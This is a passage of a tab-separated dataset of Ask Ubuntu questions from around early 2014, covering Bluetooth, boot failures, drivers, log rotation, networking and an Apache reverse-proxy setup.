bluetooth hci packets ii bluez-tools 0.1.38+git662e-3 amd64 set of tools to manage bluetooth devices for linux ii gir1.2-gnomebluetooth-1.0 3.8.1-2ubuntu2 amd64 introspection data for gnomebluetooth ii gnome-bluetooth 3.8.1-2ubuntu2 amd64 gnome bluetooth tools ii indicator-bluetooth 0.0.6daily13.02.19-0ubuntu1 amd64 system bluetooth indicator . ii libbluetooth3 : amd64 4.101-0ubuntu8b1 amd64 library to use the bluez linux bluetooth stack ii libgnome-bluetooth-dev 3.8.1-2ubuntu2 amd64 gnome bluetooth tools - support library development files ii libgnome-bluetooth11 3.8.1-2ubuntu2 amd64 gnome bluetooth tools - support library ii pulseaudio-module-bluetooth 1:4.0-0ubuntu6 amd64 bluetooth module for pulseaudio sound server ii python-bluez 0.18-2 amd64 python wrappers around bluez for rapid bluetooth development ** not able to set it as up $ hciconfig -a hci0 : type : br/edr bus : usb bd address : 00:1b:10:00:11 : dc acl mtu : 1017:8 sco mtu : 64:0 down rx bytes:457 acl:0 sco:0 events:16 errors:0 tx bytes:68 acl:0 sco:0 commands:16 errors:0 features : 0xff 0xff 0x8d 0xfe 0x9b 0xf9 0x00 0x80 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : link mode : slave accept $ sudo hciconfig hci0 up ca n't init device hci0 : operation not supported ( 95 ) $ hcitool scan device is not available : no such device $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no ** loaded modules : $ lsmod module size used by rfcomm 69070 0 bnep 19564 2 binfmt_misc 17468 1 nls_iso8859_1 12713 1 vesafb 13828 1 btusb 28267 0 bluetooth 371874 12 bnep , btusb , rfcomm nvidia 10675220 49 coretemp 13435 0 kvm_intel 138538 0 kvm 431315 1 kvm_intel hid_generic 12548 0 gpio_ich 13476 0 ppdev 17671 0 usbhid 53014 0 hid 101512 2 hid_generic , usbhid microcode 23518 0 lpc_ich 21080 0 serio_raw 13413 0 snd_hda_codec_realtek 51465 1 snd_hda_intel 48171 3 parport_pc 32701 1 snd_hda_codec 188738 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec mac_hid 13205 0 snd_pcm 102033 2 snd_hda_codec , snd_hda_intel drm 296739 2 nvidia snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq snd 69141 16 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_h da_intel , snd_seq_device , snd_seq_midi soundcore 12680 1 snd lp 17759 0 parport 42299 3 lp , ppdev , parport_pc floppy 69370 0 r8169 67341 0 mii 13934 1 r8169 $ ps axu | grep -i blue | grep -v grep root 723 0.0 0.0 19264 1720 ? ss 16:10 0:00 /usr/sbin/bluetoothd myuser 1571 0.0 0.1 448968 5604 ? sl 16:10 0:00 /usr/lib/x86_64-linux-gnu/indicator-bluetooth/indicator-bluetooth-service ** /etc/bluetooth/main.conf without comments : $ grep -v ' # ' /etc/bluetooth/main.conf | grep . [ general ] name = % h- % d class = 0x000100 discoverabletimeout = 0 pairabletimeout = 0 pagetimeout = 8192 autoconnecttimeout = 60 initiallypowered = true rememberpowered = true reverseservicediscovery = true nameresolving = true debugkeys = false enablegatt = false all advices will be appreciated .
414511	13.10 upgrade for dev machine	13.04 is no longer receiving updates , but 13.10 may seem very new-ish in terms of developer tools having had time to catch up . any experience upgrading from 13.04 desktop , from a developer 's context ? code editors , compilers , ide 's , lost settings if any , general stability and resource consumption etc..
414514	why one of the package s i 've installed is unaccessible in guake terminal ?	i installed rails framework ( ruby on rails ) on my ubuntu . today after i installed guake terminal , and i called rails command in it = > the program 'rails ' is currently not installed rails still works in ubuntu terminal but why it is unaccessible from guake terminal ? ( but other packages like cowsay ! i 've installed before are accessible in guake )
414516	suggestions on a ubuntu version suitable for this machine:	i have a 6/7 year old dell inspiron 1501 laptop which came with : 1gb ddr ram , 120gb hdd , ( dual core ? ) amd turion processor , windows vista home premium which now boots extremely slowly . i 'd prefer to replace it with a light/full version of ubuntu which runs fairly well . any suggestions on which version of ubuntu to install on it , and any gui options ( kubuntu/lubuntu ) which would make it perform faster . i would like to mention that i do use scientific linux and ubuntu 12.04 and 13.10 on a daily basis , but i have no knowledge of past versions and how well they would run on slower laptops . thank you in advance for any help and suggestions .
414519	install ubuntu mode terminal in ubuntu 12.04	i have 1 question , can you help me to tell me about : how to install ubuntu mode terminal in ubuntu 12.04 without graphict ?
414520	speed limiting ubuntu server	i am looking for a way to limit the download and upload speed of my ubuntu server ( router ) . i want to have 20 mb down and 20 mb up total . i tried trickle and wondershaper , with no success . wondershaper limited my download speed , but not my upload speed and trickle did not manage utp connections .
414521	will ubuntu 14.04 offer direct upgrade from 13.04	will ubuntu 14.04 offer a direct upgrade from 13.04 ? ubuntu desktop the main interest here .
414522	how to get back the desktop and extend the display ?	my xubuntu could n't extend the display , nor checkbox about it nor dropdown list , just `` use this '' checkbox . i tried this ( http : //www.webupd8.org/2012/11/how-to-use-multiple-monitors-in-xubuntu.html ) , first the first point ( i . ) then the second ( ii. ) . the second solution almost worked , but windows get a black overlay . then i switch of the display extension , and reboot computer . after reboot my nice blue xubuntu desktop goes away , i got a grey desktop without icons and context menu . ok , i used the google , but could n't find any solution ( tried to install xfdesktop4 any versions etc ... ) . then upgraded the xfce i think , from 4.8 to 4.10 . ( it said , cant install xfdesktop ) i got a blue desktop , i can make files on it , but no mounted icons or background , and there 's no setting for desktop in the setting manager . finally got checkbox and dropdown list on display menu , but when i extend the display , windows get black overlay , like before : so i 'm sad about it , and searching solutions for my problems . if you can really help me , please tell it to me ! very thanks !
414525	problem in openldap with tls configuration	i configured openldap with tls , but when i tried to test it with following command , i receieve the error message : $ openssl s_client -connect localhost:389 -showcerts connected ( 00000005 ) 14041704935568 : error:140790e5 : ssl routines : ssl23_write : ssl handshake failure : s23_lib.c:177 : -- - no peer certificate available -- - no client certificate ca names sent -- - ssl handshake has read 0 bytes and written 320 bytes -- - new , ( none ) , cipher is ( none ) secure renegotiation is not supported compression : none expansion : none -- - i add -tls ption in this command but my output was no peer certificate available -- - no client certificate ca names sent -- - new , ( none ) , cipher is ( none ) -- - secure renegotiation is not supported compression : none expansion : none ssl-session : protocol : tlsv1 ...
414529	no partitions are visible during ubuntu installation	i 'm trying to dual boot ubuntu alongside windows . 8 i 've tried many times with various versions , but the full hdd 500 gb is displayed with no partitions . i 've created unallocated space in windows . currently there are 4 partitions . but none is getting displayed . the output of sudo fdisk -l is below ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 8004 mb , 8004304896 bytes 255 heads , 63 sectors/track , 973 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x05f17be2 device boot start end blocks id system /dev/sda1 * 2048 15632383 7815168 b w95 fat32 disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xc3ffc3ff device boot start end blocks id system /dev/sdb1 * 157288448 158005247 358400 7 hpfs/ntfs/exfat /dev/sdb2 158005248 402685289 122340021 7 hpfs/ntfs/exfat /dev/sdb3 1985 880490519 440244267+ f w95 ext 'd ( lba ) partition 3 does not start on physical sector boundary . /dev/sdb5 2048 157286399 78642176 7 hpfs/ntfs/exfat /dev/sdb6 402701416 880490519 238894552 7 hpfs/ntfs/exfat partition table entries are not in disk order
414530	ubuntu cluster management with torque+maui	i am running a small ubuntu cluster with 8 pcs . regular users should not be able to access the individual pcs . they should only be able to submit computation tasks through qsub . also , regular users should have access to storage on the cluster . ideally , a regular user should not see where his/her files are located on individual pcs . he should see the cluster as a single storage location . and he should have access only to his files . moreover , a process running for a particular user should have access to that user 's files . how can i accomplish all this ? right now the cluster runs on ubuntu with torque + maui . it has several issues that i need to fix . one of them is that users can ssh to individual pcs and run processes there , violating the queue . i am new to linux and clusters , so try giving an answer as introductory as possible . also , links to no-nonsense tutorials on these topics will also be helpful .
414534	ubuntu does n't mount ipod	i can not access my ipod files even though the ipod is found by ubuntu . output of lsusb bus 002 device 004 : id 05ac:129e apple , inc. ipod touch 4.gen output of dmesg [ 118.991968 ] usb 2-1.2 : product : ipod [ 118.991973 ] usb 2-1.2 : manufacturer : apple inc. [ 118.991978 ] usb 2-1.2 : serialnumber : f8c18467afcfbf51bb4109357a1e38a17a4af67f i am using ubuntu 13.10 thanks in advance .
414537	change xrdp default desktop to lightdm	i read this post about changing xrdp defaults environment but how can i get lightdm to be default xrdp shell ? i got that shell as default when i log in locally but when i log in using xrdp it log to unity instead of lightdm . tnx ! ! !
414538	ubuntu gnome : customer launcher & optirun	my laptop is ivy bridge/gt 630m optimus , bumblebee works fine . adding gnome .desktop files is a piece of cake , but wondering if it 's possible to configure them to run prefixed by optirun ? it 's a pain to open a terminal and start typing . have n't seen this question answered anywhere . cheers .
414541	steam ( windows ) on ubuntu 12.04 using playonlinux	i am running ubuntu 12.04 and i am trying to run steam ( windows ) through playonlinux . i get it to start , i log in , steam sends me an e-mail with a code to register with my computer , i type it in , and steam crashes . it does this every time i try to log in . i am new to linux , so please dumb this down for me .
414549	no connection to syncdaemon	apologies in advance for my question , but i am getting crazy to fix what 's happened on my imac . i was running sync this morning , unfortunately during this the mail electric power went down . once rebooted i launched again ubuntu one app and it starts . the popup `` resuming info '' last few minutes the error is `` can not connect to sync daemon '' . please help me to solve , i can not sync many thanks for your help and support max
414550	changed username now wireless is not working . can someone please help !	i have recently changed my username and now i can no longer link up to my wireless ? help definitely needed please
414551	how do i enable a disabled admin account > using ubuntu 13.04	i some how disabled my account and every time i log in , it does not ask for my password , and when i try to enable my account it asks for my previous password . when i put in my password it says that my password is incorrect . i need urgent help because i got work to do where by i will need to download files on the command line , thus the pc will most likely ask for a password . thank you .
414557	ubuntu will not boot : `` fatal server error : no screens found ''	i 've been getting an annoying problem after restarting my laptop , ubuntu fails to boot . it will hit the purple loading screen with the ubuntu logo and dots but goes black after this . so far i know that : /etc/x11/xorg.conf - seems to be missing . sudo apt-get install xserver-xorg - it tells me there is not installation candidate . sudo apt-get install ubuntu-desktop - no installation candidate . i seem to have really screwed something up with the packages here ... does anyone have any idea where to start with this ? thanks so much in advance ! other comments : 1 ) running failsafex gives me : xinit : unable to run server `` /usr/bin/x '' : no such file or directory 2 ) ls -l /usr/bin/x : no such file or directory 3 ) ls -l /home/user/.xauthority ; -rw -- -- -- - 1 root root 103 feb 2 18:04 /home/user/.xauthority 4 ) `` reinstalltion of build-essential is not possible , it can not be downloaded . '' - network connections seems okay though ...
414558	ca n't get past /ubuntu/winboot/wubildr.mbr when trying to dual boot	i have a dell inspiron 7720 with windows 8 preinstalled . i 'm trying to use ubuntu 13.10 . i have gone through many ways to dual boot and i have made a bootable usb , shrunk my partitions , made a partition for linux , and gotten to the point where i choose windows 8.1 or ubuntu . when i choose ubuntu , i get an error that it could not find the operating system and it says '' file : /ubuntu/winboot/wubildr.mbr '' i have looked through many questions , but a lot of them refer to 12.10 and 13.04 . they also refer to an old warning that used to show up when downloading ubuntu that does n't show up anymore . some say to not use wubi . i do n't know what to do otherthan use wubi . nothing is very explanatory on what exactly to do or how to do it . i just want to know if anything is new , updated , or if i need to do things differently , since i 'm using a newer version , time has passed , and most things refer to windows 8 and not windows 8.1 . thanks
414560	using lvm with two hard drives , 1 solid state	i am setting up ubuntu and just got to the option about using lvm to partition the hard drives . my understanding is that if i do this ubuntu will be able to treat the two drives as one . that 's great , but i also want to able to distinguish between the two drives because one is a solid state and one is not . will i still be able to have a c and d drive with lvm , i.e . can i intentionally save a file to one verses the other ?
414562	wi-fi connection established but no internet access	i 've bought an asus laptop ( x552cl-sx047h model ) and i having problems with wi-fi connection . it had windows 8 preinstalled but i delete and install windows 7 and ubuntu . i run ubuntu and it connects without problems with my router but i ca n't access to network . i tried with a wired connection and it did n't work . i do n't know what 's happening but i wonder if someone could help me . thanks !
414563	lan transfer speed	when i try to download various files from various hdd`s hosted on my ubuntu 13.10 server , i get a maximum of 60mbps . these files were downloading with arround 330mbps on my old server . what could be the problem here ?
414565	computer powers itself up after shut down	the problem is as described in the post title . board : asrock h87m pro4 , with the latest bios ; ubuntu is 12.04 . 1 ) i do shut the computer down from the menu or with the command line `` poweroff '' or `` shutdown -p now '' 2 ) it totally shuts down , all fans , all leds , the screen . 3 ) it stays off for a few secs , fooling me . 4 ) then it restarts , powering itself back on . the only way to impede the restart is to switch off the power supply on the back of the case at 3 ) . doing so , it still tries to do 4 ) . you hear the fans starting , but the little charge remaining in the the power unit gets discharged in a moment and it stops there . it 's off . this problem started around mid jan ( after months of regular functioning ) , when i updated the linux kernel . can not say if that 's due to the linux kernel , as i updated again to the newest release and the problem persists . i checked also the wake-on-lan in the bios = > advanced = > acpi config . there , `` wake from onboard lan '' is disabled . i could find similar issues in various forums but no effective solutions . i know certainly this problem does not occur with windows os , therefore it seems not hardware related . in fact , it 's the second board that presents this symptoms . the board was verified as fully functional on windows . looking fwd for some hint/help .
414567	how to upgrade from12.10 now that 13.04 is eol ?	i am trying to upgrade my ubuntu virtual machine ( currently 12.10 ) to 13.04 and then eventually to 13.10 . i ran the update manager and it says `` the software on this computer is up to date . however , ubuntu 13.10 is now available ( you have 12.10 ) . '' if i hit the 'upgrade ... ' button will it install 13 . 04 or 13 . 10 ? i know it is highly recommended that users update from version to version and i am worried if i just hit 'upgrade ... ' button then something might get messed up upgrading straight to 13 . 10 if it skips over 13.04 . any ideas ?
414569	ubuntu 13.10 on thinkpad slows down dramatically when power adapter is plugged in	when i plug in my power cable -- sometimes -- ubuntu 13.10 immediately slows down in just about every way . this has been happening for months , but i only recently finally connected the dots , in part because it does not happen in all situations . however , when it is a problem , i can create it 100 % reliably by unplugging and plugging my laptop back in . this is on my lenovo thinkpad w520 , running kernel version 3.11.0-15-generic . here 's the output of dmesg immediately after plugging in : [ 228.581251 ] e1000e 0000:00:19.0 : setting latency timer to 64 [ 228.581505 ] e1000e 0000:00:19.0 : irq 48 for msi/msi-x there are no relevant messages when i unplug . i ca n't spot any meaningful patterns in top or htop before or after plugging in . the latency particularly affects nautilus , chrome , and the desktop ( alt+tab-ing , etc. ) . i have both an nvidia card and an integrated card , but i have optimus disabled . this slowdown effect occurs no matter which card i currently have enabled . here are the power settings i had in my bios when i wrote this report : i 've since tried moving the adaptive thermal management 's scheme for ac to be `` balanced '' like it is for battery , and tried moving the intel speedstep setting for ac to be `` battery optimized '' like it is for battery . i even disabled wake-on-lan , which had been set to `` ac only '' . none of these eliminated the slowdown effect when plugging in ac power . i have n't found anything that isolates and talks about this on ask ubuntu or launchpad or the internet . the closest thing is this thread on 11.10 , which might be the same , but it 's unanswered , and i do n't see the same cpu patterns ( though it 's possible my 8 cores make the cpu changes less noticeable ) . what 's going on ? edit : removed some lines about the thermal table , added the photo and more details about bios changes i 've made since then .
414570	modify indicator appearence	i 've found a theme that i really like ( flatstudio for anyone interested ) , but there is only one minor thing that works not as expected : if you look at the screenshot at the indicator-messaging menu , it looks really great ( icons are from the numix icon-theme ) but the `` bulletpoint '' which indicates the online-status has the same color as the menu background color , and is therefore invisible ... i do not want to change the color of the menu , but the color of the bulletpoint which is possible , because other themes have different colors . i already installed gnome-color-chooser but i ca n't find the option to change this specific color . i 'm willing to change the line in the corresponding .css file myself , but i need to now how the corresponding variable is called . can anyone help ? edit : i discovered that also the checkmarks in the battery indicator and bluetooth indicator etc . are invisible , due to the same reason . is it also possible to change the distance between the menu-icons and the text ?
414572	stuck on purple screen during installation	i tried to install ubuntu and i 'm stuck at the first purple screen that appears during the installation which have a ubuntu logo with 5 dots . when i press escape button it shows this : i used bootable usb drive but it did n't work either . also i have tried to redownload a fresh copy of the file and tried again but still it does n't work . how can i fix this ?
414574	installing nvidia drivers on ubuntu 12.04	i have a laptop with a 740m graphics card and i 've tried installing drivers from the additional drivers program from the system settings but when i activate and reboot the driver says it 's not being used so that did n't work . my second option was to download directly from the nvidia driver website and run it from the ternimal via lightdm stop command and it gives me an error saying my gpu is n't support when i try to run it even though my card is officially supported on the nvidia website . should i continue intsalling the diver from the nvidia website even though it gives error messages or something else . any help would be appreciated though i 'm still new here : )
414575	what services are safe to disable ?	i 'm configuring my own server , running ubuntu 13.04 . i 'd like to speed up the os a bit more by removing âunnecessaryâ system services . here is what i did : install and start rcconf to check what services are enabled on boot : $ sudo apt-get install rcconf $ sudo rcconf uncheck some services like brltty , speed-dispatcher , saned , rsync . i 'm still not sure about some services like apparmor , grub-common , kerneloops , ondemand and pppd-dns . is it safe to disable them ? do i need to uninstall those services or is disabling them is enough ?
414576	ctrl key rolls app to title bar only	merely hitting the ctrl key alone is rolling up the application window to it 's title bar so that only the title bar is showing . i ca n't find any keyboard shortcut anywhere that could be causing this . the problem is actually a major pain . imagine you are trying to paste a string in to a field in a window ... hit ctrl and the window rolls up . this effectively has disabled the ctrl-copy/paste functionality in most windows . how can i fix this ?
414582	how to resolve unmet dependencies with libminiupnpc-dev specificly ?	i have checked other pages with unmet dependencies and applied the solutions but i still receive the following error : the following packages have unmet dependencies : libminiupnpc-dev : depends : libminiupnpc8 ( = 1.6-3ubuntu1 ) but 1.6-precise2 is to be installed e : unable to correct problems , you have held broken packages . can some one help with this specific unmet dependency ?
414584	ubuntu on smart tv	is there anyway for ubuntu to run on a samsung smart tv ? at least on a usb ? i personally do n't like the smart hub that much and would like to watch cable and browse ubuntu on my tv .
414585	geforce 9800 gt - no hdmi sound output - ubuntu 12.04 lts	there 's no hdmi sound output option in the sound settings and no option in pulseaudio volume control . video goes through correctly . gpu driver installed from `` additional drivers '' ( version 304 ) . i 've installed the correct package from here : https : //code.launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily/+packages os : ubuntu 12.04 lts mobo : gygabyte ga-965p-s3 gpu : nvidia geforce 9800 gt s/pdif cable connects the mobo and the gpu .
414593	screen brightness changes on reboot	i have dell vostro 1720 with nvidia graphics card . on reboot , screen brightness changes seemingly randomly . for example , if i set brightness to 70 % , after reboot it 's usually ~47 % , sometimes 100 % . how can i prevent this ?
414594	ca n't login to my router through internal ip ?	i am trying to forward ports on the internal ip in my router config on a remote computer on the same network . but i ca n't connect to the ip ? my host system is running ubuntu server 12.04 and i can connect to the system 's external ip but not the internal ?
414602	wired network issues ( disabled ethernet )	i am brand new to linux , having downloaded it yesterday . i am booting off of a 16g usb drive , running ubuntu 13.10 . my problem is that i can not connect to the wired ethernet , at all . my computer can connect to the internet when booted off of either local hard drive ( windows vista and xp , one on each drive ) , so this is not a hardware issue . but whenever i tried to boot off of my usb drive on ubuntu , i can not connect to the internet . the network manager in the top right corner has the ethernet greyed out , and the line below that says `` disabled '' - i 'm not sure if that line refers to the ethernet or to the wifi ( which my computer does not have ) . i do n't know what i need to do to fix this . could someone help me through it ? i know i 'm probably going to edit in some outputs , but i do n't know what commands to run . according to windows , i am using : intel ( r ) pro/100 ve network connection and 6to4 adapter . the 6to4 adapter is failing to start , but i am posting this from the same computer .
414605	problem booting ubuntu 13.10	when i turn on my hp laptop , after i select ubuntu from the grub list , it stops and says : mv : ca n't create directory '/dev/.udev ' : read-only file system mv : ca n't create directory '/dev/.initramfs ' : read-only file system how can i resolve this ?
414606	rhythmbox and easy tag	my song filenames do n't show up in rhythmbox . i thought i could add tags with easytag but rhythmbox does n't recognize them . rhythmbox just shows numbers for title and i can't figure out which song is which . any suggestions ? thanks , bob
414617	installing epson printer but interrupted by lsb dependency error	i am installing the epson xp-310 driver from this website . when i attempt to install the downloaded .deb file , i get the following error : the package system is broken epson-inkjet-printer-201303w : i386 : depends : lsb ( > =3.2 ) but 4.1+debian11ubuntu is installed i 'm very confused . it says i must have lsb version > =3.2 but i have 4.1 . why am i getting the dependency error ?
414619	sound playback issues	i am getting sound playing back you tube videos with pause and play . from various web site browsers `` listen now '' players i am unable to get them to start playing in a similar manner .
414621	will my graphics card provide the highest graphics performance on ubuntu 12.04 ?	my graphics card info : intel ( r ) hd graphics memory : 1696 thats about it , its nothing fancy but will it provide good accelerating graphics automatically ?
414622	`` futility failed to exec /usr/bin/old_bins/cgpt : no such file or directory '' ( arm chromebook )	recently , i wanted to make my default start up as chrome os . however , when i typed in this command sudo cgpt add -i 6 -p 0 -s 1 /dev/mmcblk0 a prompt came up saying it has futility failed to exec /usr/bin/old_bins/cgpt : no such file or directory so i have been woundering if there is a fix to this problem on a arm chromebook running chrubuntu 12.04 .
414623	ubuntu gnome : ca n't make changing keyboard layout to crtl+shift	i have installed ubuntu gnome 13.10 and i ca n't figure out why i ca n't make changing keyboard layout shortcut to ctrl+shift . i have 3 languages in my input sources . i see in tweak tool that `` key ( s ) to change layout '' is set to ctrl+shift . if i open dconf editor i see that in desktop- > ibus- > general- > hotkey the next-engine an next-engine-in-menu preferences are set to [ 'alt+shift_l ' ] . but somehow i have figured out that input language can be changed by ctrl+shift+l . when i click ctrl+shift i can see the language changing in the top right corner , but input language stays the same . any ideas why this can happen and how can i change it ? update : also , i have found that changing system keyboard shortcut setting works in system settings- > keyboard- > shortcuts- > typing- > switch to next ( previous ) source . but i can not set there ctrl+shift or alt+shift setting which i want to set . the only comfortable combination i set there was ctrl+shift+space . i have seen a bug on this here : bug # 1218322 : ca n't set keyboard layout change to alt+shift , ctrl+shift , etc . any suggestions on how it can be fixed ?
414625	login fails although the password is correct	i am using ubuntu 12.04 32-bit . i enter my password at the default login screen and it seems to do something , but then it returns back to the same login screen and asks for the password again . not that it is incorrect because if i try to enter a wrong password , it says that the password is incorrect . in the terminal mode it lets me enter the password , and even lets me change my password . i have had problems with the nvidia driver , it would not let me get into the desktop environment , and to recover from this i ran : sudo apt-get remove nvidia-current and then sudo apt-get install nvidia-current . this restored access to the desktop environment , but now i am stuck with the password problem . with other users i can login to the desktop environment , but i fail if i try to do an update . i have tried running apt-get update and apt-get install from the terminal , but i still get the same result .
414627	win xp bootup error after increasing virtual hdd size in virtualbox	i increased virtual hdd size using vboxmanage modifyhd ~/virtualbox\ vms/xp/xp.vdi -- resize 30000 . now i wanted to start xp to get it to accept the new size but i ca n't boot . error is : ntldr is missing . i do n't have a deep enough knowledge of virtualbox to fix this .
414630	keyboard and mouse not functioning at boot	using wubi to download and install ubuntu 12.10 , everything works just fine until i boot ubuntu . it goes to the log-in screen just fine , but there both keyboard and mouse goes dead . i have tried several keyboards and mice to no avail - all lights on the keyboards are dead . i 'm using win7 , everything works perfectly there . to summarize : i ca n't log in due to keyboard inputs not being recognized . pointer does n't respond to mouse movement any ideas ?
414631	ubuntu 12.04 does not recognize graphics card and is completely unresponsive from after the first booting	i have just installed ubuntu 12.04 from a usb alongside windows 8 in a toshiba satellite l855-149 , which has a 2gb dedicated amd radeon hd 7670m graphics card . after i boot and select ubuntu my screen becomes split and full of stripes . i can not upload a photo because i have less than 10 reputation . although i can move the cursor all over the desktop , the system is completely unresponsive to clicking and to commands like ctrl+alt+t , even in recovery mode . i think the problem is that the graphics card has not been properly detected , and that i need to install the appropriate driver manually . but i ca n't do it because i can not even open the terminal or anything whatsoever when the ubuntu desktop has been launched . any suggestions as to how to fix this ? also could anybody explain why i do not have this problem while i am running ubuntu from the flash drive ?
414632	log files are taking too much space and i ca n't delete\clear them	after using ubuntu for 2.5 months , my /var directory reached around 37 gb or ram while my / directory is all 50 gb or ram and the rest of space is for my /home . i found that the following files are taking too much space in /var/log -rw-r -- -- - 1 syslog adm 14g feb 2 07:46 kern.log.1 -rw-r -- -- - 1 syslog adm 13g feb 2 07:46 ufw.log.1 -rw-r -- -- - 1 syslog adm 5.9g feb 2 07:46 syslog.1 -rw-r -- -- - 1 syslog adm 451m feb 2 23:53 syslog -rw-r -- -- - 1 syslog adm 451m feb 2 23:53 kern.log -rw-r -- -- - 1 syslog adm 441m feb 2 23:51 ufw.log side question , what is syslog and adm ? ! seeing ufw there , i checked it 's configuration $ sudo ufw status verbose status : active logging : on ( full ) < < < < < so i set logging to low $ sudo ufw logging low i read that logrotate should handle log rolling but it 's configuration does n't seem to handle the /var/log directory by default . this is my /etc/logrotate.conf file content $ cat /etc/logrotate.conf # see `` man logrotate '' for details # rotate log files weekly weekly # keep 4 weeks worth of backlogs rotate 4 # create new ( empty ) log files after rotating old ones create # uncomment this if you want your log files compressed # compress # packages drop log rotation information into this directory include /etc/logrotate.d # no packages own wtmp , or btmp -- we 'll rotate them here /var/log/wtmp { missingok monthly create 0664 root utmp rotate 1 } /var/log/btmp { missingok monthly create 0660 root utmp rotate 1 } # system-specific logs may be configured here i tried deleting the log-file-name.log.digit ( i.e . kernel.log.1 , ufw.log.1 , whatever.log.0 ) but i could n't . i tried sudo echo '' > kernel.log.1 but i failed too . it always says $ sudo echo '' > kern.log.1 bash : kern.log.1 : permission denied restarting did n't help either . the logs directory was n't cleared ( i thought linux clears all the logs when it restarts , obviously i 'm wrong ) , and i still could n't clear\delete the mentions logs . how can i clear those logs and make sure i never face this situation again ? using ubuntu 13.10 answer sudo rm /var/log/*.1 but i suspect that what made my command faile is that i tried doing the same thing while i 'm inside the directory /var/log ( i.e . pwd = /var/log , then running sudo rm kernel.1.log ) . if someone faces the same situation , please try removing *.1 files while being in the /var/log directory ( i.e . cd /var/log ; sudo rm*.1 ) and report the results . thank you .
414633	computer failing to boot after installing ubuntu 12.04.3 , `` operating system not found ''	i 've been trying now for 3 weeks to install ubuntu 12.04.3 on a sony vaio laptop . i 've learnt a fair bit but am not very knowledgeable compared to a lot of people on here so please bear that in mind . i just finally got a successful installation complete window but upon restarting got the same message i 've had for the last week , `` operating system not found '' . i appreciate that there are a few similar questions on here but with so many answers suggested i do n't know what to do . i 've just run boot repair , which failed to make a difference but gave me this link : paste.ubuntu.com/6863876 . any help is much appreciated ; i 'm trying hard not to give up . thanks !
414635	screen : loss of colour issue but not on liveusb	i am not sure if i will make this clear but i have an issue with my motherboard . i have a asus sabertooth z77 and running 2x amd hd7990 graphic cards on a watercooling loop . unfortunately in the last few days the monitor ( my tv actually ) show a loss of colours ( kind of purple ) and a patch where it looks like the screen has been smashed . when i switch to integrated gpu this issue does not exist and when i boot on a live usb of ubuntu 12.04 ( which i have installed ) again this issue is not present . one other thing is that the issue seems that is just on the first slot of pcie as i have tested by taking the power of the card placed there and attaching the vga cable to the next card . i even swapped the cards over ( a nightmare as i had to empty the loop to do that ) can someone help me on this or is this something that is totally not fixable ... very happy to post more details just tell me how as i am a novice to ubuntu ... .
414637	one ip address , two websites , on two machines - need details	this question has already been posted by another user but a detailed answer was not given.. here is the link to the original question - one ip address , two websites , on two machines i have two machines each with apache2 installed and static ip addresses . server 1 example.com static ip = 192.168.0.6 apache2 running on ports 80 and 443 fine ufw and router firewall are open on ports 80 and 443 as well server 2 domain name = myhost01.example.com static ip = 192.168.0.7 apache2 running on 8080 ( http ) and 8443 ( https ) ufw and router firewall are open on ports 8080 and 8443 when i go to { http ) www.example.com or ( https ) www.example.com - i correctly receive the web content for server 1 when i go to myhost01.example.com:8080 or myhost01.example.com:8443 - i correctly receive the web content for server 2 i would like to reverse proxy server 2 so when a user goes to http : // myhost01 .example.com/ they receive the content for http : // myhost01 . example.com:8080/ , basically hiding the port number . currently , i get an `` unable to connect/webpage not found '' error , when i try to access myhost01 ( dot ) example ( dot ) com in the virtual host file for example.com , i used the following : proxyrequests off proxypass / http : //myhost01 . example.com:8080/ proxypassreverse / http : //myhost01 .example.com:8080/ both proxy and proxy_http modules are enabled in apache2 any ideas on how to get this to work ? p.s . - spaces were added to the urls because i do not have enough reputation points to post more than two urls . ** update - see notes below server1 - example.com - vhost file < virtualhost *:80 > serveradmin myadm @ example.com servername example.com serveralias www.example.com documentroot /myweb/cmweb/apache/http # proxypreservehost on proxyrequests off proxypass / http : //myhost01.example.com:8080/ proxypassreverse / http : //myhost01.example.com:8080/ < directory / > options indexes followsymlinks allowoverride none < /directory > < directory /myweb/cmweb/apache/http/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined loglevel warn < /virtualhost > tried proxy with 192.168.0.7 replacing myhost01 ( dot ) example ( dot ) com to no avail server2 - myhost01 ( dot ) example ( dot ) com vhost file < virtualhost *:8080 > serveradmin mwdhost @ example.com servername myhost01.example.com serveralias myhost01 myhost01.example.com documentroot /mwdhost/cmweb/apache/http < directory / > options followsymlinks allowoverride none < /directory > < directory /mwdhost/cmweb/apache/http/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined loglevel warn < /virtualhost > myhost01 has been added to a record of domain registrant can do an nslookup and get correct external ip address for myhost01.example.com here below is the apache error.log for server1 - might be a clue to my problems ? ? ? sun feb 02 18:24:52 2014 ] [ error ] ( 111 ) connection refused : proxy : http : attempt to connect to 54.43.138.12:8080 ( myhost01.example.com ) failed [ sun feb 02 18:24:52 2014 ] [ error ] ap_proxy_connect_backend disabling worker for ( myhost01.example.com ) [ sun feb 02 18:24:53 2014 ] [ error ] proxy : http : disabled connection for ( myhost01.example.com ) [ mon feb 03 07:33:54 2014 ] [ warn ] init : name-based ssl virtual hosts only work for clients with tls server name indication support ( rfc 4366 )
